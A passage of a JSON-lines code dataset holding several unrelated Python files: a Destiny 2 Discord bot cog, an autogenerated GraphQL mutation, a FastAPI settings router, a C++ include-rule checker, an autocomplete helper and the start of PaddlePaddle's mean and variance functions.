pvp(self, ctx: commands.Context) -> None:\n \"\"\"\n Display a menu of each character's pvp stats\n \"\"\"\n await ctx.invoke(self.stats, \"allPvP\")\n\n @destiny.command(aliases=[\"raids\"])\n @commands.bot_has_permissions(embed_links=True, add_reactions=True)\n async def raid(self, ctx: commands.Context) -> None:\n \"\"\"\n Display a menu for each character's RAID stats\n \"\"\"\n await ctx.invoke(self.stats, \"raid\")\n\n @destiny.command(aliases=[\"qp\"])\n @commands.bot_has_permissions(embed_links=True, add_reactions=True)\n async def quickplay(self, ctx: commands.Context) -> None:\n \"\"\"\n Display a menu of past quickplay matches\n \"\"\"\n await ctx.invoke(self.history, 70)\n\n @destiny.command()\n @commands.bot_has_permissions(embed_links=True, add_reactions=True)\n async def history(self, ctx: commands.Context, activity: DestinyActivity) -> None:\n \"\"\"\n Display a menu of each character's last 5 activities\n\n `` The activity type to display stats on available types include:\n all, story, strike, raid, allpvp, patrol, allpve, control, clash,\n crimsondoubles, nightfall, heroicnightfall, allstrikes, ironbanner, allmayhem,\n supremacy, privatematchesall, survival, countdown, trialsofthenine, social,\n trialscountdown, trialssurvival, ironbannercontrol, ironbannerclash,\n ironbannersupremacy, scorednightfall, scoredheroicnightfall, rumble, alldoubles,\n doubles, privatematchesclash, privatematchescontrol, privatematchessupremacy,\n privatematchescountdown, privatematchessurvival, privatematchesmayhem,\n privatematchesrumble, heroicadventure, showdown, lockdown, scorched,\n scorchedteam, gambit, allpvecompetitive, breakthrough, blackarmoryrun,\n salvage, ironbannersalvage, pvpcompetitive, pvpquickplay, clashquickplay,\n clashcompetitive, controlquickplay, controlcompetitive, gambitprime,\n reckoning, menagerie, vexoffensive, nightmarehunt, elimination, momentum,\n dungeon, sundial, trialsofosiris\n \"\"\"\n async with ctx.typing():\n if not await self.has_oauth(ctx):\n msg = _(\n \"You need to authenticate your Bungie.net account before this command will work.\"\n )\n return await ctx.send(msg)\n user = ctx.author\n try:\n chars = await self.get_characters(user)\n except Destiny2APIError:\n # log.debug(e)\n msg = _(\"I can't seem to find your Destiny profile.\")\n await ctx.send(msg)\n return\n RAID = {\n \"assists\": _(\"Assists\"),\n \"kills\": _(\"Kills\"),\n \"deaths\": _(\"Deaths\"),\n \"opponentsDefeated\": _(\"Opponents Defeated\"),\n \"efficiency\": _(\"Efficiency\"),\n \"killsDeathsRatio\": _(\"KDR\"),\n \"killsDeathsAssists\": _(\"KDA\"),\n \"score\": _(\"Score\"),\n \"activityDurationSeconds\": _(\"Duration\"),\n \"playerCount\": _(\"Player Count\"),\n \"teamScore\": _(\"Team Score\"),\n \"completed\": _(\"Completed\"),\n }\n embeds = []\n for char_id, char in chars[\"characters\"][\"data\"].items():\n # log.debug(char)\n char_info = \"\"\n race = (await self.get_definition(\"DestinyRaceDefinition\", [char[\"raceHash\"]]))[\n str(char[\"raceHash\"])\n ]\n gender = (\n await self.get_definition(\"DestinyGenderDefinition\", [char[\"genderHash\"]])\n )[str(char[\"genderHash\"])]\n log.debug(gender)\n char_class = (\n await self.get_definition(\"DestinyClassDefinition\", [char[\"classHash\"]])\n )[str(char[\"classHash\"])]\n char_info += \"{user} - {race} {gender} {char_class} \".format(\n user=user.display_name,\n race=race[\"displayProperties\"][\"name\"],\n gender=gender[\"displayProperties\"][\"name\"],\n char_class=char_class[\"displayProperties\"][\"name\"],\n )\n try:\n data = await self.get_activity_history(user, char_id, activity)\n except Exception:\n log.error(\n _(\n \"Something went wrong I couldn't get info on character {char_id} for activity {activity}\"\n ).format(char_id=char_id, activity=activity)\n )\n continue\n if not data:\n continue\n\n for activities in data[\"activities\"]:\n activity_hash = str(activities[\"activityDetails\"][\"directorActivityHash\"])\n activity_data = (\n await self.get_definition(\"DestinyActivityDefinition\", [activity_hash])\n )[str(activity_hash)]\n embed = discord.Embed(\n title=activity_data[\"displayProperties\"][\"name\"],\n description=activity_data[\"displayProperties\"][\"description\"],\n )\n\n date = datetime.datetime.strptime(activities[\"period\"], \"%Y-%m-%dT%H:%M:%SZ\")\n embed.timestamp = date\n if activity_data[\"displayProperties\"][\"hasIcon\"]:\n embed.set_thumbnail(\n url=IMAGE_URL + activity_data[\"displayProperties\"][\"icon\"]\n )\n elif (\n activity_data[\"pgcrImage\"] != \"/img/misc/missing_icon_d2.png\"\n and \"emblemPath\" in char\n ):\n embed.set_thumbnail(url=IMAGE_URL + char[\"emblemPath\"])\n embed.set_author(name=char_info, icon_url=user.avatar_url)\n for attr, name in RAID.items():\n if activities[\"values\"][attr][\"basic\"][\"value\"] < 0:\n continue\n embed.add_field(\n name=name,\n value=str(activities[\"values\"][attr][\"basic\"][\"displayValue\"]),\n )\n embed = await self.get_char_colour(embed, char)\n\n embeds.append(embed)\n await BaseMenu(\n source=BasePages(\n pages=embeds,\n ),\n delete_message_after=False,\n clear_reactions_after=True,\n timeout=60,\n cog=self,\n page_start=0,\n ).start(ctx=ctx)\n\n @staticmethod\n async def get_extra_attrs(stat_type: str, attrs: dict) -> dict:\n \"\"\"Helper function to receive the total attributes we care about\"\"\"\n EXTRA_ATTRS = {}\n if stat_type == \"allPvECompetitive\":\n EXTRA_ATTRS = {\n \"winLossRatio\": _(\"Win Loss Ratio\"),\n \"invasions\": _(\"Invasions\"),\n \"invasionKills\": _(\"Invasion Kills\"),\n \"invasionDeaths\": _(\"Invasion Deaths\"),\n \"invaderDeaths\": _(\"Invader Deaths\"),\n \"invaderKills\": _(\"Invader Kills\"),\n \"primevalKills\": _(\"Primeval Kills\"),\n \"blockerKills\": _(\"Blocker Kills\"),\n \"mobKills\": _(\"Mob Kills\"),\n \"highValueKills\": _(\"High Value Targets Killed\"),\n \"motesPickedUp\": _(\"Motes Picked Up\"),\n \"motesDeposited\": _(\"Motes Deposited\"),\n \"motesDenied\": _(\"Motes Denied\"),\n \"motesLost\": _(\"Motes Lost\"),\n }\n if stat_type == \"allPvP\":\n EXTRA_ATTRS = {\"winLossRatio\": _(\"Win Loss Ratio\")}\n for k, v in EXTRA_ATTRS.items():\n attrs[k] = v\n return attrs\n\n async def build_character_stats(\n self, user: discord.Member, chars: dict, stat_type: str\n ) -> List[discord.Embed]:\n\n embeds: List[discord.Embed] = []\n for char_id, char in chars[\"characters\"][\"data\"].items():\n # log.debug(char)\n\n try:\n data = await self.get_historical_stats(user, char_id, 0)\n except Exception:\n log.error(\n _(\"Something went wrong I couldn't get info on character {char_id}\").format(\n char_id=char_id\n )\n )\n continue\n if not data:\n continue\n try:\n if stat_type != \"allPvECompetitive\":\n embed = await self.build_stat_embed_char_basic(user, char, data, stat_type)\n embeds.append(embed)\n else:\n data = data[stat_type][\"allTime\"]\n embed = await self.build_stat_embed_char_gambit(user, char, data, stat_type)\n embeds.append(embed)\n except Exception:\n log.error(\n f\"User {user.id} had an issue generating stats for character {char_id}\",\n exc_info=True,\n )\n continue\n return embeds\n\n async def build_stat_embed_char_basic(\n self, user: discord.Member, char: dict, data: dict, stat_type: str\n ) -> discord.Embed:\n char_info = \"\"\n race = (await self.get_definition(\"DestinyRaceDefinition\", [char[\"raceHash\"]]))[\n str(char[\"raceHash\"])\n ]\n gender = (await self.get_definition(\"DestinyGenderDefinition\", [char[\"genderHash\"]]))[\n str(char[\"genderHash\"])\n ]\n char_class = (await self.get_definition(\"DestinyClassDefinition\", [char[\"classHash\"]]))[\n str(char[\"classHash\"])\n ]\n char_info += \"{user} - {race} {gender} {char_class} \".format(\n user=user.display_name,\n race=race[\"displayProperties\"][\"name\"],\n gender=gender[\"displayProperties\"][\"name\"],\n char_class=char_class[\"displayProperties\"][\"name\"],\n )\n ATTRS = {\n \"opponentsDefeated\": _(\"Opponents Defeated\"),\n \"efficiency\": _(\"Efficiency\"),\n \"bestSingleGameKills\": _(\"Best Single Game Kills\"),\n \"bestSingleGameScore\": _(\"Best Single Game Score\"),\n \"precisionKills\": _(\"Precision Kills\"),\n \"longestKillSpree\": _(\"Longest Killing Spree\"),\n \"longestSingleLife\": _(\"Longest Single Life\"),\n \"totalActivityDurationSeconds\": _(\"Total time playing\"),\n \"averageLifespan\": _(\"Average Life Span\"),\n \"weaponBestType\": _(\"Best Weapon Type\"),\n }\n embed = discord.Embed(title=stat_type.title())\n embed.set_author(name=char_info, icon_url=user.avatar_url)\n kills = data[stat_type][\"allTime\"][\"kills\"][\"basic\"][\"displayValue\"]\n deaths = data[stat_type][\"allTime\"][\"deaths\"][\"basic\"][\"displayValue\"]\n assists = data[stat_type][\"allTime\"][\"assists\"][\"basic\"][\"displayValue\"]\n kda = f\"{kills} | {deaths} | {assists}\"\n embed.add_field(name=_(\"Kills | Deaths | Assists\"), value=kda)\n if \"emblemPath\" in char:\n embed.set_thumbnail(url=IMAGE_URL + char[\"emblemPath\"])\n for stat, values in data[stat_type][\"allTime\"].items():\n\n if values[\"basic\"][\"value\"] < 0 or stat not in ATTRS:\n continue\n embed.add_field(name=ATTRS[stat], value=str(values[\"basic\"][\"displayValue\"]))\n if \"killsDeathsRatio\" in data[stat_type] and \"killsDeathsAssists\" in data[stat_type]:\n kdr = data[stat_type][\"killsDeathsRatio\"]\n kda = data[stat_type][\"killsDeathsAssists\"]\n if kdr or kda:\n embed.add_field(name=_(\"KDR/KDA\"), value=f\"{kdr}/{kda}\")\n if (\n \"resurrectionsPerformed\" in data[stat_type]\n and \"resurrectionsReceived\" in data[stat_type]\n ):\n res = data[stat_type][\"resurrectionsPerformed\"]\n resur = data[stat_type][\"resurrectionsReceived\"]\n if res or resur:\n embed.add_field(name=_(\"Resurrections/Received\"), value=f\"{res}/{resur}\")\n return await self.get_char_colour(embed, char)\n\n async def build_stat_embed_char_gambit(\n self, user: discord.Member, char: dict, data: dict, stat_type: str\n ) -> discord.Embed:\n char_info = \"\"\n race = (await self.get_definition(\"DestinyRaceDefinition\", [char[\"raceHash\"]]))[\n str(char[\"raceHash\"])\n ]\n gender = (await self.get_definition(\"DestinyGenderDefinition\", [char[\"genderHash\"]]))[\n str(char[\"genderHash\"])\n ]\n char_class = (await self.get_definition(\"DestinyClassDefinition\", [char[\"classHash\"]]))[\n str(char[\"classHash\"])\n ]\n char_info += \"{user} - {race} {gender} {char_class} \".format(\n user=user.display_name,\n race=race[\"displayProperties\"][\"name\"],\n gender=gender[\"displayProperties\"][\"name\"],\n char_class=char_class[\"displayProperties\"][\"name\"],\n )\n ATTRS = {\n \"opponentsDefeated\": _(\"Opponents Defeated\"),\n \"efficiency\": _(\"Efficiency\"),\n \"bestSingleGameKills\": _(\"Best Single Game Kills\"),\n \"bestSingleGameScore\": _(\"Best Single Game Score\"),\n \"precisionKills\": _(\"Precision Kills\"),\n \"longestKillSpree\": _(\"Longest Killing Spree\"),\n \"longestSingleLife\": _(\"Longest Single Life\"),\n \"totalActivityDurationSeconds\": _(\"Total time playing\"),\n \"averageLifespan\": _(\"Average Life Span\"),\n \"weaponBestType\": _(\"Best Weapon Type\"),\n \"winLossRatio\": _(\"Win Loss Ratio\"),\n }\n embed = discord.Embed(title=\"Gambit\")\n embed.set_author(name=char_info, icon_url=user.avatar_url)\n kills = data[\"kills\"][\"basic\"][\"displayValue\"]\n deaths = data[\"deaths\"][\"basic\"][\"displayValue\"]\n assists = data[\"assists\"][\"basic\"][\"displayValue\"]\n kda = f\"{kills} | {deaths} | {assists}\"\n embed.add_field(name=_(\"Kills | Deaths | Assists\"), value=kda)\n small_blocker = data[\"smallBlockersSent\"][\"basic\"][\"displayValue\"]\n med_blocker = data[\"mediumBlockersSent\"][\"basic\"][\"displayValue\"]\n large_blocker = data[\"largeBlockersSent\"][\"basic\"][\"displayValue\"]\n blockers = f\"S {small_blocker}, M {med_blocker}, L {large_blocker}\"\n embed.add_field(name=_(\"Blockers\"), value=blockers)\n invasions = _(\"Invasions: {invasions}\").format(\n invasions=data[\"invasions\"][\"basic\"][\"displayValue\"]\n )\n invasion_kills = _(\"Kills: {kills}\\nDeaths: {deaths}\").format(\n kills=data[\"invasionKills\"][\"basic\"][\"displayValue\"],\n deaths=data[\"invasionDeaths\"][\"basic\"][\"displayValue\"],\n )\n embed.add_field(name=invasions, value=invasion_kills)\n invaders = _(\"Killed: {killed}\\nKilled By: {by}\").format(\n killed=data[\"invaderKills\"][\"basic\"][\"displayValue\"],\n by=data[\"invaderDeaths\"][\"basic\"][\"displayValue\"],\n )\n embed.add_field(name=_(\"Invaders\"), value=invaders)\n motes_dep = data[\"motesDeposited\"][\"basic\"][\"value\"]\n try:\n lost = 1 - (motes_dep / data[\"motesPickedUp\"][\"basic\"][\"value\"])\n motes_lost = \"{:.2%}\".format(lost)\n except ZeroDivisionError:\n motes_lost = \"0%\"\n motes = _(\"{motes:,} ({lost} Lost)\").format(motes=motes_dep, lost=motes_lost)\n embed.add_field(name=_(\"Motes Deposited\"), value=motes)\n motes_denied = data[\"motesDenied\"][\"basic\"][\"value\"]\n embed.add_field(name=_(\"Motes Denied\"), value=\"{:,}\".format(motes_denied))\n mob_kills = data[\"mobKills\"][\"basic\"][\"value\"]\n primeval_kills = data[\"primevalKills\"][\"basic\"][\"value\"]\n high_kills = data[\"highValueKills\"][\"basic\"][\"value\"]\n kills_msg = _(\"Primevals: {prime:,}\\nHigh Value Targets: {high:,}\\nMobs: {mobs:,}\").format(\n prime=primeval_kills, high=high_kills, mobs=mob_kills\n )\n embed.add_field(name=_(\"Kill Stats\"), value=kills_msg)\n if \"killsDeathsRatio\" in data and \"killsDeathsAssists\" in data:\n kdr = data[\"killsDeathsRatio\"][\"basic\"][\"displayValue\"]\n kda = data[\"killsDeathsAssists\"][\"basic\"][\"displayValue\"]\n if kdr or kda:\n embed.add_field(name=_(\"KDR/KDA\"), value=f\"{kdr}/{kda}\")\n if \"resurrectionsPerformed\" in data and \"resurrectionsReceived\" in data:\n res = data[\"resurrectionsPerformed\"][\"basic\"][\"displayValue\"]\n resur = data[\"resurrectionsReceived\"][\"basic\"][\"displayValue\"]\n if res or resur:\n embed.add_field(name=_(\"Resurrections/Received\"), value=f\"{res}/{resur}\")\n if \"emblemPath\" in char:\n embed.set_thumbnail(url=IMAGE_URL + char[\"emblemPath\"])\n for stat, values in data.items():\n\n if values[\"basic\"][\"value\"] < 0 or stat not in ATTRS:\n continue\n embed.add_field(name=ATTRS[stat], value=str(values[\"basic\"][\"displayValue\"]))\n\n return await self.get_char_colour(embed, char)\n\n @destiny.command()\n @commands.bot_has_permissions(embed_links=True, add_reactions=True)\n async def stats(self, ctx: commands.Context, stat_type: StatsPage, all: bool = True) -> None:\n \"\"\"\n Display each character's stats for a specific activity\n `` The type of stats to display, available options are:\n `raid`, `pvp`, `pve`, patrol, story, gambit, and strikes\n \"\"\"\n async with ctx.typing():\n if not await self.has_oauth(ctx):\n msg = _(\n \"You need to authenticate your Bungie.net account before this command will work.\"\n )\n return await ctx.send(msg)\n user = ctx.author\n try:\n chars = await self.get_characters(user)\n except Destiny2APIError:\n # log.debug(e)\n msg = _(\"I can't seem to find your Destiny profile.\")\n await ctx.send(msg)\n return\n # base stats should be available for all stat types\n embeds = await self.build_character_stats(user, chars, stat_type)\n\n if not embeds:\n return await ctx.send(\n _(\"No stats could be found for that activity and character.\")\n )\n await BaseMenu(\n source=BasePages(\n pages=embeds,\n ),\n delete_message_after=False,\n clear_reactions_after=True,\n timeout=60,\n cog=self,\n page_start=0,\n ).start(ctx=ctx)\n\n @destiny.command()\n @checks.is_owner()\n @commands.bot_has_permissions(add_reactions=True)\n async def manifest(self, ctx: commands.Context, d1: bool = False) -> None:\n \"\"\"\n See the current manifest version and optionally re-download it\n \"\"\"\n if not d1:\n try:\n headers = await self.build_headers()\n except Exception:\n return await ctx.send(\n _(\n \"You need to set your API authentication tokens with `[p]destiny token` first.\"\n )\n )\n manifest_data = await self.request_url(\n f\"{BASE_URL}/Destiny2/Manifest/\", headers=headers\n )\n version = await self.config.manifest_version()\n if not version:\n version = _(\"Not Downloaded\")\n msg = _(\"Current manifest version is {version}.\").format(version=version)\n redownload = _(\"re-download\")\n if manifest_data[\"version\"] != version:\n msg += _(\"\\n\\nThere is an update available to version {version}\").format(\n version=manifest_data[\"version\"]\n )\n redownload = _(\"download\")\n await ctx.send(msg)\n await ctx.trigger_typing()\n msg = await ctx.send(\n _(\"Would you like to {redownload} the manifest?\").format(redownload=redownload)\n )\n start_adding_reactions(msg, ReactionPredicate.YES_OR_NO_EMOJIS)\n pred = ReactionPredicate.yes_or_no(msg, ctx.author)\n try:\n react, user = await self.bot.wait_for(\"reaction_add\", check=pred, timeout=15)\n except asyncio.TimeoutError:\n await msg.delete()\n if pred.result:\n try:\n version = await self.get_manifest()\n except Exception:\n log.exception(\"Error getting destiny manifest\")\n return await ctx.send(_(\"There was an issue downloading the manifest.\"))\n await msg.delete()\n await ctx.send(f\"Manifest {version} was downloaded.\")\n else:\n await msg.delete()\n else:\n try:\n version = await self.get_manifest(d1)\n except Exception:\n log.exception(\"Error getting D1 manifest\")\n return await ctx.send(_(\"There was an issue downloading the manifest.\"))\n\n @destiny.command()\n @checks.is_owner()\n async def token(\n self, ctx: commands.Context, api_key: str, client_id: str, client_secret: str\n ) -> None:\n \"\"\"\n Set the API tokens for Destiny 2's API\n\n Required information is found at:\n https://www.bungie.net/en/Application\n select **Create New App**\n Choose **Confidential** OAuth Client type\n Select the scope you would like the bot to have access to\n Set the redirect URL to https://localhost/\n NOTE: It is strongly recommended to use this command in DM\n \"\"\"\n await self.config.api_token.api_key.set(api_key)\n await self.config.api_token.client_id.set(client_id)\n await self.config.api_token.client_secret.set(client_secret)\n if ctx.channel.permissions_for(ctx.me).manage_messages:\n await ctx.message.delete()\n await ctx.send(\"Destiny 2 API credentials set!\")\n"} {"ext": "py", "sha": "1a2f0ebacc99295885853ad29a470b3803afd2c8", "content": "#!/usr/bin/env python3\n# @generated AUTOGENERATED file. Do not Change!\n\nfrom dataclasses import dataclass\nfrom datetime import datetime\nfrom gql.gql.datetime_utils import DATETIME_FIELD\nfrom gql.gql.graphql_client import GraphqlClient\nfrom functools import partial\nfrom numbers import Number\nfrom typing import Any, Callable, List, Mapping, Optional\n\nfrom dataclasses_json import DataClassJsonMixin\n\nfrom .equipment_port_type_fragment import EquipmentPortTypeFragment, QUERY as EquipmentPortTypeFragmentQuery\nfrom .edit_equipment_port_type_input import EditEquipmentPortTypeInput\n\n\nQUERY: List[str] = EquipmentPortTypeFragmentQuery + [\"\"\"\nmutation EditEquipmentPortTypeMutation($input: EditEquipmentPortTypeInput!) {\n editEquipmentPortType(input: $input) {\n ...EquipmentPortTypeFragment\n }\n}\n\n\"\"\"]\n\n@dataclass\nclass EditEquipmentPortTypeMutation(DataClassJsonMixin):\n @dataclass\n class EditEquipmentPortTypeMutationData(DataClassJsonMixin):\n @dataclass\n class EquipmentPortType(EquipmentPortTypeFragment):\n pass\n\n editEquipmentPortType: EquipmentPortType\n\n data: EditEquipmentPortTypeMutationData\n\n @classmethod\n # fmt: off\n def execute(cls, client: GraphqlClient, input: EditEquipmentPortTypeInput) -> EditEquipmentPortTypeMutationData:\n # fmt: off\n variables = {\"input\": input}\n response_text = client.call(''.join(set(QUERY)), variables=variables)\n return cls.from_json(response_text).data\n"} {"ext": "py", "sha": "1a2f0f61afd76a87fe73e5a154f969f50391dd65", "content": "from api.api_error import APIError\nfrom api.api_message import APIMessage\nfrom api.json_connector import JSONConnector\nfrom api.api_config import APIConfig\nfrom api.ptp_connector import PTPConnector\n\n\nclass BotMethods:\n\n @staticmethod\n def start_bot(req):\n \"\"\"\n Starts a PTP Bot object.\n :param req:\n :return:\n \"\"\"\n keys = req.keys()\n\n if 'bot_name' not in keys or not req['bot_name']:\n return APIError.create(message='No bot name in the request body.', code=400)\n elif 'action_name' not in keys or not req['action_name']:\n return APIError.create(message='No action name in the request body.', code=400)\n\n bots = JSONConnector.get_json_file_content(\n directory=APIConfig.json_save_path,\n name=APIConfig.json_bots_file_name\n )\n\n bot_actions = JSONConnector.get_json_file_content(\n directory=APIConfig.json_save_path,\n name=APIConfig.json_bot_actions_file_name\n )\n\n found_action = {}\n found_bot = {}\n\n for item in bot_actions['bot_actions']:\n print(req, item)\n if req['bot_name'] == item['bot_name'] and req['action_name'] == item['action_name']:\n found_action = item\n\n for item in bots['bots']:\n if req['bot_name'] == item['bot_name']:\n found_bot = item\n\n if found_action and found_bot:\n access_info = {\n 'access_token': found_bot['access_token'],\n 'access_token_secret': found_bot['access_token_secret'],\n 'consumer_key': found_bot['consumer_key'],\n 'consumer_secret': found_bot['consumer_secret']\n }\n\n PTPConnector.start_bot(access_info, found_action['method'], {'actions': found_action['actions']})\n\n return APIMessage.create(message='Bot successfully started.', code=200)\n"} {"ext": "py", "sha": "1a2f1067e877603262ee3997806d4aac8f9c8561", "content": "from fastapi import APIRouter, BackgroundTasks, Depends, File, UploadFile\nfrom typing import List\n\nfrom sqlalchemy.orm import Session\n\nfrom api.utils.auth import get_db\nfrom api.auth.auth import auth_check\n\nfrom api.db.crud import templates as crud\nfrom api.db.crud import settings as scrud\nfrom api.db.schemas import templates as schemas\nfrom api.db.models import containers\nfrom api.db.database import engine\n\nfrom api.actions import resources\nfrom api.actions.apps import _update_self, check_self_update\n\nfrom api.settings import Settings\n\nfrom fastapi_jwt_auth import AuthJWT\n\n\ncontainers.Base.metadata.create_all(bind=engine)\n\nsettings = Settings()\n\nrouter = APIRouter()\n\n\n@router.get(\n \"/variables\",\n response_model=List[schemas.TemplateVariables],\n operation_id=\"authorize\",\n)\ndef read_template_variables(\n db: Session = Depends(get_db), Authorize: AuthJWT = Depends()\n):\n auth_check(Authorize)\n return crud.read_template_variables(db=db)\n\n\n@router.post(\n \"/variables\",\n response_model=List[schemas.TemplateVariables],\n)\ndef set_template_variables(\n new_variables: List[schemas.TemplateVariables],\n db: Session = Depends(get_db),\n Authorize: AuthJWT = Depends(),\n):\n auth_check(Authorize)\n return crud.set_template_variables(new_variables=new_variables, db=db)\n\n\n@router.get(\n \"/export\",\n response_model=schemas.Import_Export,\n)\ndef export_settings(db: Session = Depends(get_db), Authorize: AuthJWT = Depends()):\n auth_check(Authorize)\n return scrud.export_settings(db=db)\n\n\n@router.post(\n \"/export\",\n)\ndef import_settings(\n db: Session = Depends(get_db),\n upload: UploadFile = File(...),\n Authorize: AuthJWT = Depends(),\n):\n auth_check(Authorize)\n return scrud.import_settings(db=db, upload=upload)\n\n\n@router.get(\n \"/prune/{resource}\",\n)\ndef prune_resources(resource: str, Authorize: AuthJWT = Depends()):\n auth_check(Authorize)\n return resources.prune_resources(resource)\n\n\n@router.get(\n \"/update\",\n)\ndef update_self(background_tasks: BackgroundTasks, Authorize: AuthJWT = Depends()):\n auth_check(Authorize)\n return _update_self(background_tasks)\n\n\n@router.get(\n \"/check/update\",\n)\ndef _check_self_update(Authorize: AuthJWT = Depends()):\n auth_check(Authorize)\n return check_self_update()\n"} {"ext": "py", "sha": "1a2f108938ac1fd13e7ad508326814a45b6c54b5", "content": "#! /usr/bin/env python\n# -*- coding: UTF-8 -*-\n\nfrom base.basic_config_if import BasicConfig\nfrom commons.configurator import Configurator\nfrom cpp.incl_deps.include_deps_if import FileIncludeDepsSupply\nfrom cpp.incl_deps.include_rule_checker_if import IncludeRulesFactory\nfrom cpp.incl_deps.include_rule_checker_util import (IncludeRuleCheckerProcessor, \n IncludeRuleCheckerOutputter)\nimport csv\nimport logging\nimport sys\n\nconfig_basic = BasicConfig()\nconfig_checker = IncludeRulesFactory()\nconfig_file_include_deps_supply = FileIncludeDepsSupply()\n\ndef main():\n logging.basicConfig(stream=sys.stderr,level=logging.DEBUG)\n Configurator().default()\n \n if len(sys.argv) > 1:\n file_links = csv.reader(open(sys.argv[1]), delimiter=',')\n else: \n file_links = config_file_include_deps_supply.get_file_include_deps()\n \n illegal_links, total_count, rule_violations = IncludeRuleCheckerProcessor().check_links(file_links, config_checker.get_include_rules())\n IncludeRuleCheckerOutputter().output(sys.stdout, illegal_links, total_count, rule_violations)\n\nif __name__ == \"__main__\":\n main()\n"} {"ext": "py", "sha": "1a2f1094bfd1df43995d93f1d87fef39c68f3a48", "content": "\"\"\"\nThis is how to enable `language()` for one Autocomplete::\n\n import autocomplete_light.shortcuts as al\n from al.contrib.hvad import AutocompleteModelBase\n\n al.register(YourModel, AutocompleteModelBase)\n\nOr, enable it globally by updating your `autodiscover()` call like this::\n\n import autocomplete_light.shortcuts as al\n from al.contrib.hvad import AutocompleteModelBase\n al.registry.autocomplete_model_base = AutocompleteModelBase\n al.autodiscover()\n\nIn that case, you can just register as usual::\n\n al.register(YourTranslatableModel)\n\"\"\"\n\nimport autocomplete_light.shortcuts as al\n\n\nclass AutocompleteModel(al.AutocompleteModel):\n \"\"\" Ensure that `.language()` is called. \"\"\"\n def __init__(self, request=None, values=None):\n \"\"\"\n Overridden init to call .language(). Note: this will replace the\n base `choices`.\n \"\"\"\n if getattr(self.choices.model.objects, 'language', False):\n self.choices = self.choices.model.objects.language()\n super(AutocompleteModel, self).__init__(request, values)\n\n\nclass AutocompleteModelBase(AutocompleteModel, al.AutocompleteBase):\n \"\"\" Drop-in replacement for AutocompleteModelBase \"\"\"\n pass\n\n\nclass AutocompleteModelTemplate(AutocompleteModel, al.AutocompleteTemplate):\n \"\"\" Drop-in replacement for AutocompleteModelTemplate \"\"\"\n pass\n"} {"ext": "py", "sha": "1a2f10ba8d33361465de1e4248a22b9c1099a771", "content": "# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# TODO: define statistical functions of a tensor \n\nimport numpy as np\nfrom ..fluid.framework import Variable\nfrom ..fluid.layer_helper import LayerHelper\nfrom ..fluid.framework import core, in_dygraph_mode\nfrom ..fluid import layers\nfrom .search import where\nfrom ..fluid.data_feeder import convert_dtype, check_variable_and_dtype, check_type, check_dtype\nimport paddle\nfrom paddle import _C_ops\n\n__all__ = []\n\n\ndef mean(x, axis=None, keepdim=False, name=None):\n \"\"\"\n Computes the mean of the input tensor's elements along ``axis``.\n\n Args:\n x (Tensor): The input Tensor with data type float32, float64.\n axis (int|list|tuple, optional): The axis along which to perform mean\n calculations. ``axis`` should be int, list(int) or tuple(int). If\n ``axis`` is a list/tuple of dimension(s), mean is calculated along\n all element(s) of ``axis`` . ``axis`` or element(s) of ``axis``\n should be in range [-D, D), where D is the dimensions of ``x`` . If\n ``axis`` or element(s) of ``axis`` is less than 0, it works the\n same way as :math:`axis + D` . If ``axis`` is None, mean is\n calculated over all elements of ``x``. Default is None.\n keepdim (bool, optional): Whether to reserve the reduced dimension(s)\n in the output Tensor. If ``keepdim`` is True, the dimensions of\n the output Tensor is the same as ``x`` except in the reduced\n dimensions(it is of size 1 in this case). Otherwise, the shape of\n the output Tensor is squeezed in ``axis`` . Default is False.\n name (str, optional): Name for the operation (optional, default is None).\n For more information, please refer to :ref:`api_guide_Name`.\n\n Returns:\n Tensor, results of average along ``axis`` of ``x``, with the same data\n type as ``x``.\n\n Examples:\n .. code-block:: python\n\n import paddle\n\n x = paddle.to_tensor([[[1., 2., 3., 4.],\n [5., 6., 7., 8.],\n [9., 10., 11., 12.]],\n [[13., 14., 15., 16.],\n [17., 18., 19., 20.],\n [21., 22., 23., 24.]]])\n out1 = paddle.mean(x)\n # [12.5]\n out2 = paddle.mean(x, axis=-1)\n # [[ 2.5 6.5 10.5]\n # [14.5 18.5 22.5]]\n out3 = paddle.mean(x, axis=-1, keepdim=True)\n # [[[ 2.5]\n # [ 6.5]\n # [10.5]]\n # [[14.5]\n # [18.5]\n # [22.5]]]\n out4 = paddle.mean(x, axis=[0, 2])\n # [ 8.5 12.5 16.5]\n \"\"\"\n\n if isinstance(axis, int):\n axis = [axis]\n reduce_all = True if axis is None \\\n or len(axis)==0 \\\n or len(axis) == len(x.shape) else False\n if axis is None or len(axis) == 0:\n axis = [0]\n\n if in_dygraph_mode():\n return _C_ops.reduce_mean(x, 'dim', axis, 'keep_dim', keepdim,\n 'reduce_all', reduce_all)\n\n check_variable_and_dtype(x, 'x/input', ['float32', 'float64'],\n 'mean/reduce_mean')\n check_type(axis, 'axis/dim', (int, list, tuple), 'mean/reduce_mean')\n if isinstance(axis, (list, tuple)):\n for item in axis:\n check_type(item, 'elements of axis/dim', (int), 'mean/reduce_mean')\n\n helper = LayerHelper('mean', **locals())\n attrs = {'dim': axis, 'keep_dim': keepdim, 'reduce_all': reduce_all}\n out = helper.create_variable_for_type_inference(x.dtype)\n helper.append_op(\n type='reduce_mean', inputs={'X': x}, outputs={'Out': out}, attrs=attrs)\n return out\n\n\ndef var(x, axis=None, unbiased=True, keepdim=False, name=None):\n \"\"\"\n Computes the variance of ``x`` along ``axis`` .\n\n Args:\n x (Tensor): The input Tensor with data type float32, float64.\n axis (int|list|tuple, optional): The axis along which to perform\n variance calculations. ``axis`` should be int, list(int) or\n tuple(int). If ``axis`` is a list/tuple of dimension(s), variance\n is calculated along all element(s) of ``axis`` . ``axis`` or\n element(s) of ``axis`` should be in range [-D, D), where D is the\n dimensions of ``x`` . If ``axis`` or element(s) of ``axis`` is less\n than 0, it works the same way as :math:`axis + D` . If ``axis`` is\n None, variance is calculated over all elements of ``x``. Default\n is None.\n unbiased (bool, optional): Whether to use the unbiased estimation. If\n ``unbiased`` is True, the divisor used in the computation is\n :math:`N - 1`, where :math:`N` represents the number of elements\n along ``axis`` , otherwise the divisor is :math:`N`. Default is True.\n keepdim (bool, optional): Whether to 